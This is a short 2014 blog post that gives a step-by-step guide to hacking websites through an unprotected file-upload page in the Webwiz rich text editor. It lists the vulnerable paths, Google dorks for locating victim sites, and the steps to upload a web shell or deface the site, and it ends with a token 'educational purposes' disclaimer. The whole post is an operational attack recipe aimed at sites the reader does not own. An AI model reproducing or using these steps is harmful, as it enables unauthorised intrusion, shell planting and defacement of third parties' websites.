Tuesday, April 01, 2014

HACK Website with RTE Webwiz Vulnerability | File Shell upload


HACK Website with RTE Webwiz Vulnerability | File Shell upload:Guyz again I'm here with new WEB VULNERABLITY called HACK Website with RTE Webwiz Vulnerability | File Shell upload.
Webwiz rich text editor HTML code is carried in the open after they are sent charCode due functioning of the page .So Lets start..

Follow The Instructions:-

1). Expolits:-
  • site.com/rte/RTE_popup_file_atch.asp 
  • site.com/admin/RTE_popup_file_atch.asp
2). Go to google and type one of the following dorks.

  • inurl:rte/my_documents/my_files
  • inurl:/my_documents/my_files/ 

3). Open any site ..say

site.com/rte/my_documents/my_files/

4). Now replace every thing after site.com with
 rte/RTE_popup_file_atch.asp 
so it will look like-
site.com/rte/RTE_popup_file_atch.asp 

5). Open it and upload you Shell or deface


6). Now click on upload button and after that you will get path to your uploded file in the FILE URL box



Happy hacking.. Only for Educational Purposes..!

0 on: "HACK Website with RTE Webwiz Vulnerability | File Shell upload"